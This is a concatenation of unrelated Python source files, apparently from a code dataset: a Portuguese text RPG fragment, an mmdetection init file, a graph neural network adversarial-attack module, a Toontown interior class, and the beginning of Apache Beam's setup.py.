classe_armainicial(classe)
print_location()
def classe_armainicial(classe):
if str.lower(classe) in ['guerreiro','espadachin','espadachim','gladiador','barbaro','paladino']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura media e uma -espada de ferro inicial!")
elif str.lower(classe) in ['arqueiro','atirador','cacador']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura leve e um -arco simples inicial!")
elif str.lower(classe) in ['ninja','samurai']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura media e uma -katana de ferro inicial!")
elif str.lower(classe) in ['lutador','monje','monge']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura media e uma -Luva de ferro pontiagudo inicial!")
elif str.lower(classe) in ['curandeiro','mago','bruxo','healer','feiticeira','feiticeiro','maga','bruxa']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente um chapéu leve de feitico e um -Cajado magico inicial!")
elif str.lower(classe)in['druida','xama','sentinela','guardiao']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura media e um -machadinho de ferro inicial!")
else:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura de couro e uma -adaga inicial!")
###########Map##########
#player starts at b2
ZONENAME=' '
DESCRICAO = 'descricao'
EXAMINACAO = 'examinar'
SOLVED=False
UP='up','norte','north','cima'
DOWN='down','south','baixo','sul'
LEFT='left','west','esquerda','oeste'
RIGHT='right','east','direita','leste'
solved_places={'a1':False,'a2':False,'a3':False,'a4':False,
'b1':False,'b2':False,'b3':False,'b4':False,
'c1':False,'c2':False,'c3':False,'c4':False}
zonemap={
    'a1':{
        ZONENAME: "Zona de treinamento",
        DESCRICAO: 'Onde podes aprender como funciona o sistema de batalha e conseguir missoes extras',
        EXAMINACAO: 'Todos parecem muito focados em melhorar...',
        SOLVED: False,
        UP: '',
        DOWN: 'b1',
        LEFT: '',
        RIGHT: 'a2'
    },
    'a2':{
        ZONENAME: "Rua 120-t",
        DESCRICAO: 'liga Zona de treinamento ao Quartel',
        EXAMINACAO: 'a rua parece a mesma de sempre',
        SOLVED: False,
        UP: '',
        DOWN: 'b2',
        LEFT: 'a1',
        RIGHT: 'a3'
    },
    'a3':{
        ZONENAME: "Quartel",
        DESCRICAO: 'Aqui onde o general do batalhao se encontra na maioria das vezes. Importantes missoes sao dadas aqui',
        EXAMINACAO: 'Aqui anda bem movimento...como sempre',
        SOLVED: False,
        UP: '',
        DOWN: 'b3',
        LEFT: 'a2',
        RIGHT: 'a4'
    },
    'a4':{
        ZONENAME: "Floresta",
        DESCRICAO: 'Uma floresta normal ao lado do quartel',
        EXAMINACAO: 'As arvores estao lindas essa epoca do ano...',
        SOLVED: False,
        UP: '',
        DOWN: 'b4',
        LEFT: 'a3',
        RIGHT: ''
    },
    'b1':{
        ZONENAME: "",
        DESCRICAO: 'descricao',
        EXAMINACAO: 'examinar',
        SOLVED: False,
        UP: 'a1',
        DOWN: 'c1',
        LEFT: '',
        RIGHT: 'b2'
    },
    'b2':{
        ZONENAME: 'Casa',
        DESCRICAO: 'Aqui eh onde voce mora...por enquanto,',
        EXAMINACAO: 'Sua casa parece a mesma coisa de sempre',
        SOLVED: False,
        UP: 'a2',
        DOWN: 'c2',
        LEFT: 'b1',
        RIGHT: 'b3'
    },
    'b3':{
        ZONENAME: "Vizinho",
        DESCRICAO: 'Nao conheco muito os vizinhos... mas parecem pessoas legais',
        EXAMINACAO: 'Examinar a casa dos outros eh meio...esquisito',
        SOLVED: False,
        UP: 'a3',
        DOWN: 'c3',
        LEFT: 'b2',
        RIGHT: 'b4'
    },
    'b4':{
        ZONENAME: "Floresta",
        DESCRICAO: 'Uma floresta normal ao lado do quartel',
        EXAMINACAO: 'As arvores estao lindas essa epoca do ano...',
        SOLVED: False,
        UP: 'a4',
        DOWN: 'c4',
        LEFT: 'b3',
        RIGHT: ''
    },
    'c1':{
        ZONENAME: "Saida da cidade principal",
        DESCRICAO: 'Ao examinar aqui voce concorda em sair do local. Deseja mesmo sair?',
        EXAMINACAO: 'Saindo',
        SOLVED: False,
        UP: 'b1',
        DOWN: '',
        LEFT: '',
        RIGHT: 'c2'
    },
    'c2':{
        ZONENAME: "Portoes da cidade",
        DESCRICAO: 'Aqui eh a entrada da cidade principal',
        EXAMINACAO: 'Os portoes sempre abertos. Parece mesmo perigoso...',
        SOLVED: False,
        UP: 'b2',
        DOWN: '',
        LEFT: 'c1',
        RIGHT: 'c3'
    },
    'c3':{
        ZONENAME: "Rua principal",
        DESCRICAO: 'O coracao da cidade',
        EXAMINACAO: 'Seu vizinho fica logo a cima, mais em cima ha o Quartel. A esquerda fica os portoes e mais a esquerda a saida da cidade. Esquerda e pra cima voce chega em casa. Duas esquerdas e duas cima voce chega na zona de treinamento!',
        SOLVED: False,
        UP: 'b3',
        DOWN: '',
        LEFT: 'c2',
        RIGHT: 'c4'
    },
    'c4':{
        ZONENAME: "Trilha para a floresta",
        DESCRICAO: 'A floresta esta logo a cima!',
        EXAMINACAO: 'Lugar bem calmo',
        SOLVED: False,
        UP: 'b4',
        DOWN: '',
        LEFT: 'c3',
        RIGHT: ''
    }
}
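# Example lookup (sketch): zonemap['a1'][DOWN] is 'b1', so moving "baixo"/south
# from the training zone lands at b1, while zonemap['a1'][UP] is '' (no exit).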
####Game interactivity########
def print_location():
print ('\n'+('#'*(4+len(myPlayer.location))))
print ('#' + myPlayer.location.upper()+'#')
print ('#'+zonemap[myPlayer.location][DESCRICAO]+'#')
print ('\n'+('#'*(4+len(myPlayer.location))))
def prompt():
print ("\n"+"=======================")
print ("Digite o que gostaria de fazer")
action=input("> ")
    acceptable_actions=['mover','ir','viajar','inspecionar','interagir','descricao','olhar','sair']
while action.lower() not in acceptable_actions:
print ("Acao desconhecida, tente novamente.\n")
action=input("> ")
if action.lower() == 'sair':
sys.exit()
elif action.lower() in ['mover','ir','viajar']:
player_move(action.lower())
elif action.lower() in ['inspecionar','interagir','descricao','olhar']:
player_examine(action.lower())
def player_move(myAction):
ask="Onde voce gostaria de ir? \n"
dest=input(ask)
    if dest in UP:
        destination=zonemap[myPlayer.location][UP]
        movement_handler(destination)
    elif dest in LEFT:
        destination=zonemap[myPlayer.location][LEFT]
        movement_handler(destination)
    elif dest in DOWN:
        destination=zonemap[myPlayer.location][DOWN]
        movement_handler(destination)
    elif dest in RIGHT:
        destination=zonemap[myPlayer.location][RIGHT]
        movement_handler(destination)
def movement_handler(destination):
print ("\n"+ "Voce se moveu para "+ destination)
myPlayer.location=destination
print_location()
def player_examine(action):
if zonemap[myPlayer.location][SOLVED]==True:
print ("Voce ja sabe tudo sobre aqui.")
else:
print ("Voce ainda pode fazer coisas por aqui.")
if __name__ == '__main__':
main()
| 40.114362 | 373 | 0.610555 |
84b6dc393cd509588c124b4cafe4a8a149433c2d | 422 | py | Python | mmdet/apis/__init__.py | XiaoyuHuang96/mmdetection | e2ff08b68e2f5907a59976dcedb055036c03eecf | [
"Apache-2.0"
] | null | null | null | mmdet/apis/__init__.py | XiaoyuHuang96/mmdetection | e2ff08b68e2f5907a59976dcedb055036c03eecf | [
"Apache-2.0"
] | null | null | null | mmdet/apis/__init__.py | XiaoyuHuang96/mmdetection | e2ff08b68e2f5907a59976dcedb055036c03eecf | [
"Apache-2.0"
] | null | null | null | from .env import get_root_logger, init_dist, set_random_seed
from .inference import (inference_detector, init_detector, show_result,
show_result_pyplot)
from .train import train_detector
from .myutils import OurRunner
__all__ = [
'init_dist', 'get_root_logger', 'set_random_seed', 'train_detector',
    'init_detector', 'inference_detector', 'show_result', 'show_result_pyplot', 'OurRunner'
]
| 35.166667 | 90 | 0.746445 |
aaa9308bc6ca3de3fae08dad6e5631dd6aeb1655 | 2,096 | py | Python | pbx_gs_python_utils/Update_Lambda_Functions.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 3 | 2018-12-14T15:43:46.000Z | 2019-04-25T07:44:58.000Z | pbx_gs_python_utils/Update_Lambda_Functions.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 1 | 2019-05-11T14:19:37.000Z | 2019-05-11T14:51:04.000Z | pbx_gs_python_utils/Update_Lambda_Functions.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 4 | 2018-12-27T04:54:14.000Z | 2019-05-11T14:07:47.000Z | # import sys
# sys.path.append('..')
#
# import json
#
# from pbx_gs_python_utils.utils.Dev import Dev
# from pbx_gs_python_utils.utils.Lambdas_Helpers import slack_message
# from osbot_aws.apis.Lambda import Lambda
#
#
# class Update_Lambda_Functions:
#
# def update_lambda_function(self, name):
# try:
# Lambda(name).update_with_lib()
# return { 'status':'ok' , 'name': name}
# except Exception as error:
# return { 'status':'error' , 'name': name, 'details': '{0}'.format(error)}
#
# def update_lambda_functions(self):
# print('\n in update_lambda_functions ... \n')
#
# targets = [
# 'pbx_gs_python_utils.lambdas.gsbot.lambda_gs_bot', # lambda_gs_bot API_GS_Bot GS_Bot_Commands
# 'pbx_gs_python_utils.lambdas.gsbot.gsbot_gs_jira', # gsbot_gs_jira GS_Bot_ Jira_Commands
# 'pbx_gs_python_utils.lambdas.gsbot.gsbot_slack' , # gsbot_slack Slack_Commands_Helper
#
# 'pbx_gs_python_utils.lambdas.gs.elastic_jira' , # elastic_jira GS_Bot_Jira
#
# 'pbx_gs_python_utils.lambdas.utils.log_to_elk' , # log_to_elk Log_To_Elk
# 'pbx_gs_python_utils.lambdas.utils.slack_message', # slack_message API_Slack
#
# ]
# result = []
# for target in targets:
# result.append(self.update_lambda_function(target))
#
# text = ":building_construction: *updated lambda functions* for `pbx_gs_python_utils`:"
# attachments = [{'text': json.dumps(result, indent=4), 'color': 'good'}]
# slack_message(text, attachments,'DDKUZTK6X','T7F3AUXGV') # gs-bot-tests
# Dev.pprint(result)
#
# return result
#
# # def healthcheck_gs_elastic_jira(self):
# # target = Lambda('gs.elastic_jira')
# # Dev.pprint(target.info())
#
#
# if __name__ == '__main__':
# Update_Lambda_Functions().update_lambda_functions() | 41.098039 | 137 | 0.594943 |
77145b78603a87cea8541430a2ff9fb64cd6654c | 10,843 | py | Python | gnn_pygan/gan_attack/attacker/attacker_sup.py | Guo-lab/Graph | c4c5fbc8fb5d645c16da20351b9746019cf75aab | [
"MIT"
] | null | null | null | gnn_pygan/gan_attack/attacker/attacker_sup.py | Guo-lab/Graph | c4c5fbc8fb5d645c16da20351b9746019cf75aab | [
"MIT"
] | null | null | null | gnn_pygan/gan_attack/attacker/attacker_sup.py | Guo-lab/Graph | c4c5fbc8fb5d645c16da20351b9746019cf75aab | [
"MIT"
] | null | null | null | import torch as ch
import torch.nn as nn
from tqdm import tqdm
from utils import helpers
from . import attack_steps
from estimator.estimator import mi_loss, mi_loss_neg
import time, gc
class Attacker(ch.nn.Module):
"""
Attacker class, used to make adversarial examples.
This is primarily an internal class, you probably want to be looking at
:class:`robustness.attacker.AttackerModel`, which is how models are actually
served (AttackerModel uses this Attacker class).
However, the :meth:`robustness.Attacker.forward` function below
documents the arguments supported for adversarial attacks specifically.
"""
def __init__(self, model, features, nb_nodes, idx_train, train_lbls, batch_size=1, sparse=True,
dataset=None, attack_mode='A', show_attack=True, gpu=True):
"""
Initialize the Attacker
Args:
nn.Module model : the PyTorch model to attack
Dataset dataset : dataset the model is trained on, only used to get mean and std for normalization
"""
super(Attacker, self).__init__()
# self.normalize = helpers.InputNormalize(dataset.mean, dataset.std)
self.model = model
# self.sp_adj = sp_adj
# self.sp_A = sp_A
# self.sp_adj_ori = sp_adj_ori
self.features = features
self.nb_nodes = nb_nodes
self.batch_size = batch_size
self.sparse = sparse
self.dataset = dataset
self.attack_mode = attack_mode
self.show_attack = show_attack
self.gpu = gpu
self.idx_train = idx_train
self.train_lbls = train_lbls
self.I = ch.eye(self.nb_nodes)
if self.gpu:
self.I = self.I.cuda()
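    # Hypothetical construction (a sketch; `encoder`, `feats`, `idx_train` and
    # `lbls` are assumed to come from the surrounding training script):
    #   atk = Attacker(encoder, feats, nb_nodes=N, idx_train=idx_train,
    #                  train_lbls=lbls, attack_mode='A')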
def forward(self, encoder, log_sup, adj_sys, A, target, eps, step_size, iterations, xent, b_xent,
eps_x=0.1, step_size_x=1e-5,
random_start=False, random_restarts=False, do_tqdm=False,
targeted=False, custom_loss=None, should_normalize=True,
orig_input=None, use_best=True, return_image=True, est_grad=None,
make_adv=True, return_a=False):
if self.dataset == 'pubmed':
A = A.to_dense()
# Can provide a different input to make the feasible set around
# instead of the initial point
if orig_input is None: orig_input = adj_sys.detach()
# orig_input = orig_input.cuda()
# Multiplier for gradient ascent [untargeted] or descent [targeted]
m = -1 if targeted else 1
# Main function for making adversarial examples
def get_adv_examples(adj, A, return_a=False):
# Initialize step class and attacker criterion
step_class = attack_steps.L0Step
step = step_class(orig_input=orig_input, A=A, eps=eps, step_size=step_size, nb_nodes=self.nb_nodes)
iterator = range(iterations)
if do_tqdm: iterator = tqdm(iterator)
# Keep track of the "best" (worst-case) loss and its
# corresponding input
best_loss = None
best_delta_A = None
# A function that updates the best loss and best input
def replace_best(loss, bloss, x, bx):
if bloss is None:
bx = x.clone().detach()
bloss = loss.clone().detach()
else:
replace = m * bloss < m * loss
bx[replace] = x[replace].clone().detach()
bloss[replace] = loss[replace]
return bloss, bx
# PGD iterate
C = 1 - 2 * A - self.I
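            # C encodes the allowed flip per entry: +1 where no edge exists
            # (delta_A adds one), -1 on existing edges (delta_A removes one),
            # and 0 on the diagonal (assuming A has no self-loops), so the
            # diagonal stays frozen under A + delta_A * C.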
delta_A = ch.autograd.Variable(ch.zeros(adj.shape, dtype=ch.float32), requires_grad=True)
if self.gpu:
delta_A = delta_A.cuda()
for _ in iterator:
delta_A = delta_A.requires_grad_(True)
adj = self.preprocess(A + delta_A * C)
embeds, _ = encoder.embed(self.features, adj, True, None, grad=True)
train_embs = embeds[0, self.idx_train]
logits = log_sup(train_embs)
loss = xent(logits, self.train_lbls)
# loss = mi_loss(self.model, adj, self.features, self.nb_nodes, b_xent, self.batch_size, self.sparse)
if self.show_attack:
print(" Attack Loss: {}".format(loss.detach().cpu().numpy()))
if step.use_grad:
if est_grad is None:
grad, = ch.autograd.grad(m * loss, [delta_A], retain_graph=True)
else:
f = lambda _x: m * mi_loss(self.model, _x, self.features, self.nb_nodes, b_xent, self.batch_size, self.sparse)
grad = helpers.calc_est_grad(f, adj, target, *est_grad)
else:
grad = None
with ch.no_grad():
args = [loss, best_loss, delta_A, best_delta_A]
best_loss, best_delta_A = replace_best(*args) if use_best else (loss, delta_A)
delta_A = step.step(delta_A, grad)
delta_A = step.project(delta_A)
if self.gpu:
delta_A = delta_A.cuda()
if do_tqdm: iterator.set_description("Current loss: {l}".format(l=loss))
grad.cpu()
del grad
gc.collect()
ch.cuda.empty_cache()
# Save computation (don't compute last loss) if not use_best
if not use_best:
ret = adj.clone().detach()
return step.to_image(ret) if return_image else ret
embeds, _ = encoder.embed(self.features, self.preprocess(step.to_image(delta_A)+A), True, None)
train_embs = embeds[0, self.idx_train]
logits = log_sup(train_embs)
loss = xent(logits, self.train_lbls)
# loss = mi_loss(self.model, self.preprocess(step.to_image(delta_A)+A), self.features,
# self.nb_nodes, b_xent, self.batch_size, self.sparse)
args = [loss, best_loss, delta_A, best_delta_A]
best_loss, best_delta_A = replace_best(*args)
if return_a:
return step.to_image(best_delta_A, show=True)+A if return_image else best_delta_A
else:
return self.preprocess(step.to_image(best_delta_A, show=True)+A) if return_image else best_delta_A
# return self.preprocess(step.to_image(best_A, A_ori)) if return_image else best_A
# Main function for making adversarial examples
def get_adv_x_examples(x):
# Initialize step class and attacker criterion
stepx_class = attack_steps.LinfStep
stepx = stepx_class(orig_input=orig_input, A=A, eps=eps, eps_x=eps_x, step_size=step_size,
step_size_x=step_size_x, nb_nodes=self.nb_nodes)
iterator = range(iterations)
if do_tqdm: iterator = tqdm(iterator)
# Keep track of the "best" (worst-case) loss and its
# corresponding input
best_loss = None
best_x = None
# A function that updates the best loss and best input
def replace_best(loss, bloss, x, bx):
if bloss is None:
bx = x.clone().detach()
bloss = loss.clone().detach()
else:
replace = m * bloss < m * loss
bx[replace] = x[replace].clone().detach()
bloss[replace] = loss[replace]
return bloss, bx
# PGD iterate
for _ in iterator:
x = x.clone().detach().requires_grad_(True)
embeds, _ = encoder.embed(x, adj_sys, True, None, grad=True)
train_embs = embeds[0, self.idx_train]
logits = log_sup(train_embs)
loss = xent(logits, self.train_lbls)
# loss = mi_loss(self.model, adj_sys, x, self.nb_nodes, b_xent, self.batch_size, self.sparse)
# loss = mi_loss_neg(self.model, x, self.sp_adj_ori, self.features, self.nb_nodes, b_xent, self.batch_size, self.sparse)
if self.show_attack:
print(" Attack Loss: {}".format(loss.detach().cpu().numpy()))
if stepx.use_grad:
if est_grad is None:
# ch.cuda.empty_cache()
grad, = ch.autograd.grad(m * loss, [x], retain_graph=True)
else:
                        f = lambda _x: m * mi_loss(self.model, adj_sys, _x, self.nb_nodes, b_xent, self.batch_size, self.sparse)
                        grad = helpers.calc_est_grad(f, x, target, *est_grad)
else:
grad = None
with ch.no_grad():
args = [loss, best_loss, x, best_x]
best_loss, best_x = replace_best(*args) if use_best else (loss, x)
x = stepx.step(x, grad)
x = stepx.project(x, self.features)
if do_tqdm: iterator.set_description("Current loss: {l}".format(l=loss))
# Save computation (don't compute last loss) if not use_best
if not use_best:
ret = x.clone().detach()
return ret
# loss = mi_loss(self.model, adj_sys, x, self.nb_nodes, b_xent, self.batch_size, self.sparse)
embeds, _ = encoder.embed(x, adj_sys, True, None, grad=True)
train_embs = embeds[0, self.idx_train]
logits = log_sup(train_embs)
loss = xent(logits, self.train_lbls)
args = [loss, best_loss, x, best_x]
best_loss, best_x = replace_best(*args)
return best_x
# Random restarts: repeat the attack and find the worst-case
# example for each input in the batch
if self.attack_mode == 'A':
adv_ret = get_adv_examples(adj_sys, A, return_a)
return adv_ret
if self.attack_mode == 'X':
adv_X_ret = get_adv_x_examples(self.features)
return adv_X_ret
elif self.attack_mode == 'both':
adv_ret = get_adv_examples(adj_sys, A, return_a)
adv_X_ret = get_adv_x_examples(self.features)
return adv_ret, adv_X_ret
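    # preprocess() below applies the standard GCN symmetric normalization
    #   A_hat = D^(-1/2) (A + I) D^(-1/2),  D = diag(sum(A + I, axis=0)).
    # Worked 2-node example: A = [[0, 1], [1, 0]] gives A + I = [[1, 1], [1, 1]],
    # D = diag(2, 2), and hence A_hat = [[0.5, 0.5], [0.5, 0.5]].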
def preprocess(self, adj):
adj = adj + self.I
D = ch.diag(1 / ch.sqrt(ch.sum(adj, 0)))
adj_sys = ch.matmul(ch.matmul(D, adj), D)
# adj_sys = ch.matmul(ch.matmul(ch.diag(1 / ch.sqrt(ch.sum(adj + self.I, 0))), adj + self.I), ch.diag(1 / ch.sqrt(ch.sum(adj + self.I, 0))))
return adj_sys | 43.721774 | 148 | 0.564143 |
b900d491f7619c1134430f85f667338aa9f5f9c5 | 7,796 | py | Python | v1.0.0.test/toontown/building/DistributedToonInterior.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 4 | 2019-07-01T15:46:43.000Z | 2021-07-23T16:26:48.000Z | v1.0.0.test/toontown/building/DistributedToonInterior.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 1 | 2019-06-29T03:40:05.000Z | 2021-06-13T01:15:16.000Z | v1.0.0.test/toontown/building/DistributedToonInterior.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 4 | 2019-07-28T21:18:46.000Z | 2021-02-25T06:37:25.000Z | from toontown.toonbase.ToonBaseGlobal import *
from panda3d.core import *
from panda3d.toontown import *
from direct.interval.IntervalGlobal import *
from direct.distributed.ClockDelta import *
from toontown.toonbase import ToontownGlobals
import ToonInterior
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.distributed import DistributedObject
from direct.fsm import State
import random, ToonInteriorColors
from toontown.hood import ZoneUtil
from toontown.toon import ToonDNA
from toontown.toon import ToonHead
SIGN_LEFT = -4
SIGN_RIGHT = 4
SIGN_BOTTOM = -3.5
SIGN_TOP = 1.5
FrameScale = 1.4
class DistributedToonInterior(DistributedObject.DistributedObject):
def __init__(self, cr):
DistributedObject.DistributedObject.__init__(self, cr)
self.fsm = ClassicFSM.ClassicFSM('DistributedToonInterior', [State.State('toon', self.enterToon, self.exitToon, ['beingTakenOver']), State.State('beingTakenOver', self.enterBeingTakenOver, self.exitBeingTakenOver, []), State.State('off', self.enterOff, self.exitOff, [])], 'toon', 'off')
self.fsm.enterInitialState()
def generate(self):
DistributedObject.DistributedObject.generate(self)
def announceGenerate(self):
DistributedObject.DistributedObject.announceGenerate(self)
self.setup()
def disable(self):
self.interior.removeNode()
del self.interior
DistributedObject.DistributedObject.disable(self)
def delete(self):
del self.fsm
DistributedObject.DistributedObject.delete(self)
def randomDNAItem(self, category, findFunc):
codeCount = self.dnaStore.getNumCatalogCodes(category)
index = self.randomGenerator.randint(0, codeCount - 1)
code = self.dnaStore.getCatalogCode(category, index)
return findFunc(code)
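    # Note: self.randomGenerator is re-seeded with self.zoneId in setup(), so
    # randomDNAItem picks the same "random" assets for a given zone on every
    # client and all players see an identical interior.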
def replaceRandomInModel(self, model):
baseTag = 'random_'
npc = model.findAllMatches('**/' + baseTag + '???_*')
for i in xrange(npc.getNumPaths()):
np = npc.getPath(i)
name = np.getName()
b = len(baseTag)
category = name[b + 4:]
key1 = name[b]
key2 = name[(b + 1)]
if key1 == 'm':
model = self.randomDNAItem(category, self.dnaStore.findNode)
newNP = model.copyTo(np)
c = render.findAllMatches('**/collision')
c.stash()
if key2 == 'r':
self.replaceRandomInModel(newNP)
elif key1 == 't':
texture = self.randomDNAItem(category, self.dnaStore.findTexture)
np.setTexture(texture, 100)
newNP = np
if key2 == 'c':
if category == 'TI_wallpaper' or category == 'TI_wallpaper_border':
self.randomGenerator.seed(self.zoneId)
newNP.setColorScale(self.randomGenerator.choice(self.colors[category]))
else:
newNP.setColorScale(self.randomGenerator.choice(self.colors[category]))
def setup(self):
self.dnaStore = base.cr.playGame.dnaStore
self.randomGenerator = random.Random()
self.randomGenerator.seed(self.zoneId)
interior = self.randomDNAItem('TI_room', self.dnaStore.findNode)
self.interior = interior.copyTo(render)
hoodId = ZoneUtil.getCanonicalHoodId(self.zoneId)
self.colors = ToonInteriorColors.colors[hoodId]
self.replaceRandomInModel(self.interior)
doorModelName = 'door_double_round_ul'
if doorModelName[-1:] == 'r':
doorModelName = doorModelName[:-1] + 'l'
else:
doorModelName = doorModelName[:-1] + 'r'
door = self.dnaStore.findNode(doorModelName)
door_origin = render.find('**/door_origin;+s')
doorNP = door.copyTo(door_origin)
door_origin.setScale(0.8, 0.8, 0.8)
door_origin.setPos(door_origin, 0, -0.025, 0)
color = self.randomGenerator.choice(self.colors['TI_door'])
DNADoor.setupDoor(doorNP, self.interior, door_origin, self.dnaStore, str(self.block), color)
doorFrame = doorNP.find('door_*_flat')
doorFrame.wrtReparentTo(self.interior)
doorFrame.setColor(color)
sign = hidden.find('**/tb%s:*_landmark_*_DNARoot/**/sign;+s' % (self.block,))
if not sign.isEmpty():
signOrigin = self.interior.find('**/sign_origin;+s')
newSignNP = sign.copyTo(signOrigin)
mat = self.dnaStore.getSignTransformFromBlockNumber(int(self.block))
inv = Mat4(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
inv.invertFrom(mat)
newSignNP.setMat(inv)
newSignNP.flattenLight()
ll = Point3()
ur = Point3()
newSignNP.calcTightBounds(ll, ur)
width = ur[0] - ll[0]
height = ur[2] - ll[2]
if width != 0 and height != 0:
xScale = (SIGN_RIGHT - SIGN_LEFT) / width
zScale = (SIGN_TOP - SIGN_BOTTOM) / height
scale = min(xScale, zScale)
xCenter = (ur[0] + ll[0]) / 2.0
zCenter = (ur[2] + ll[2]) / 2.0
newSignNP.setPosHprScale((SIGN_RIGHT + SIGN_LEFT) / 2.0 - xCenter * scale, -0.1, (SIGN_TOP + SIGN_BOTTOM) / 2.0 - zCenter * scale, 0.0, 0.0, 0.0, scale, scale, scale)
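                # min(xScale, zScale) preserves the sign's aspect ratio while
                # fitting it inside the SIGN_LEFT/RIGHT/BOTTOM/TOP box; the
                # position terms re-center the scaled sign within that box.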
trophyOrigin = self.interior.find('**/trophy_origin')
trophy = self.buildTrophy()
if trophy:
trophy.reparentTo(trophyOrigin)
del self.colors
del self.dnaStore
del self.randomGenerator
self.interior.flattenMedium()
def setZoneIdAndBlock(self, zoneId, block):
self.zoneId = zoneId
self.block = block
def setToonData(self, savedBy):
self.savedBy = savedBy
def buildTrophy(self):
        if self.savedBy is None:
return
else:
numToons = len(self.savedBy)
pos = 1.25 - 1.25 * numToons
trophy = hidden.attachNewNode('trophy')
for avId, name, dnaNetString, isGM in self.savedBy:
frame = self.buildFrame(name, dnaNetString)
frame.reparentTo(trophy)
frame.setPos(pos, 0, 0)
pos += 2.5
return trophy
def buildFrame(self, name, dnaNetString):
frame = loader.loadModel('phase_3.5/models/modules/trophy_frame')
dna = ToonDNA.ToonDNA(dnaNetString)
head = ToonHead.ToonHead()
head.setupHead(dna)
head.setPosHprScale(0, -0.05, -0.05, 180, 0, 0, 0.55, 0.02, 0.55)
if dna.head[0] == 'r':
head.setZ(-0.15)
elif dna.head[0] == 'h':
head.setZ(0.05)
elif dna.head[0] == 'm':
head.setScale(0.45, 0.02, 0.45)
head.reparentTo(frame)
nameText = TextNode('trophy')
nameText.setFont(ToontownGlobals.getToonFont())
nameText.setAlign(TextNode.ACenter)
nameText.setTextColor(0, 0, 0, 1)
nameText.setWordwrap(5.36 * FrameScale)
nameText.setText(name)
namePath = frame.attachNewNode(nameText.generate())
namePath.setPos(0, -0.03, -0.6)
namePath.setScale(0.186 / FrameScale)
frame.setScale(FrameScale, 1.0, FrameScale)
return frame
def setState(self, state, timestamp):
self.fsm.request(state, [globalClockDelta.localElapsedTime(timestamp)])
def enterOff(self):
pass
def exitOff(self):
pass
def enterToon(self):
pass
def exitToon(self):
pass
def enterBeingTakenOver(self, ts):
messenger.send('clearOutToonInterior')
def exitBeingTakenOver(self):
pass | 39.175879 | 295 | 0.611852 |
245b08cf6141a4b19eeffc90c2f731d3af3471db | 11,063 | py | Python | sdks/python/setup.py | chermenin/beam | 53d5ebf812f57fc48827475552109399274d772e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | sdks/python/setup.py | chermenin/beam | 53d5ebf812f57fc48827475552109399274d772e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | sdks/python/setup.py | chermenin/beam | 53d5ebf812f57fc48827475552109399274d772e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Apache Beam SDK for Python setup file."""
import os
import sys
import warnings
from distutils.errors import DistutilsError
from distutils.version import StrictVersion
# Pylint and isort disagree here.
# pylint: disable=ungrouped-imports
import setuptools
from pkg_resources import DistributionNotFound
from pkg_resources import get_distribution
from pkg_resources import normalize_path
from pkg_resources import to_filename
from setuptools import Command
from setuptools.command.build_py import build_py
from setuptools.command.develop import develop
from setuptools.command.egg_info import egg_info
from setuptools.command.test import test
class mypy(Command):
user_options = []
def initialize_options(self):
"""Abstract method that is required to be overwritten"""
def finalize_options(self):
"""Abstract method that is required to be overwritten"""
def get_project_path(self):
self.run_command('egg_info')
# Build extensions in-place
self.reinitialize_command('build_ext', inplace=1)
self.run_command('build_ext')
ei_cmd = self.get_finalized_command("egg_info")
project_path = normalize_path(ei_cmd.egg_base)
return os.path.join(project_path, to_filename(ei_cmd.egg_name))
def run(self):
import subprocess
args = ['mypy', self.get_project_path()]
result = subprocess.call(args)
if result != 0:
raise DistutilsError("mypy exited with status %d" % result)
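# The command is registered in cmdclass below, so `python setup.py mypy`
# type-checks the built egg directory (with in-place extensions) rather than
# the raw source tree.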
def get_version():
global_names = {}
exec( # pylint: disable=exec-used
open(os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'apache_beam/version.py')
).read(),
global_names
)
return global_names['__version__']
PACKAGE_NAME = 'apache-beam'
PACKAGE_VERSION = get_version()
PACKAGE_DESCRIPTION = 'Apache Beam SDK for Python'
PACKAGE_URL = 'https://beam.apache.org'
PACKAGE_DOWNLOAD_URL = 'https://pypi.python.org/pypi/apache-beam'
PACKAGE_AUTHOR = 'Apache Software Foundation'
PACKAGE_EMAIL = 'dev@beam.apache.org'
PACKAGE_KEYWORDS = 'apache beam'
PACKAGE_LONG_DESCRIPTION = '''
Apache Beam is a unified programming model for both batch and streaming
data processing, enabling efficient execution across diverse distributed
execution engines and providing extensibility points for connecting to
different technologies and user communities.
'''
REQUIRED_PIP_VERSION = '7.0.0'
_PIP_VERSION = get_distribution('pip').version
if StrictVersion(_PIP_VERSION) < StrictVersion(REQUIRED_PIP_VERSION):
warnings.warn(
